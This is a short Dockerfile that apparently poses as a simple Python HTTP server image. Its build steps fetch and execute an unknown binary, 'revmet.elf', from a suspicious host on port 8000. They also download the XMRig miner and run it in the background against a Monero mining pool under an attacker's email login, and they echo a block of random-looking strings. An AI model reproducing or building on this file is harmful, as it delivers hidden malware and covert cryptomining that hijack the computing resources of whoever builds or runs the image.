FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 8g7lP42fPq80ZfAEzDcRUwcf1Ia2WWBf vmwUNQS4hOQk42YVlbem4XAfkHa9D5aB jxCxEjz8zSu2PjTmTcWneNVFHm6jTLhg 4tWaj6CxHXGfvhuBrqv2WJ1zWGQXrsUy jlERPgZeaYkEI3vWXS8Ux8sovJ9VMhFT 107JnQo6EOjOel1j8if5rBAPFWsPAk5K 0qfM4IYcwghx2DfJDj38HwX7nZfTLMNE gnTu34Ng3M7zlJ1gmWQXVDV1iZ2vZy4T r39b8b1Knckytsu3pa314E3la823r0tu BTPus9LTospDilWtyyJMTOVZZCPpXcnq FNGRxhPgreWlRU7dwVsfWRTu5DjAr8EK 96RCEMvfR0jjabUsQBOckrXaEM2b30iP kZEOJ70LDCShhnf1UtCddykonYptTN5s okMJPwmCCXTlgQ39PpiIfRlurEiZUn4w rO19IDHaKtm2rIYod0W9RjZgdEPDmsuO DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]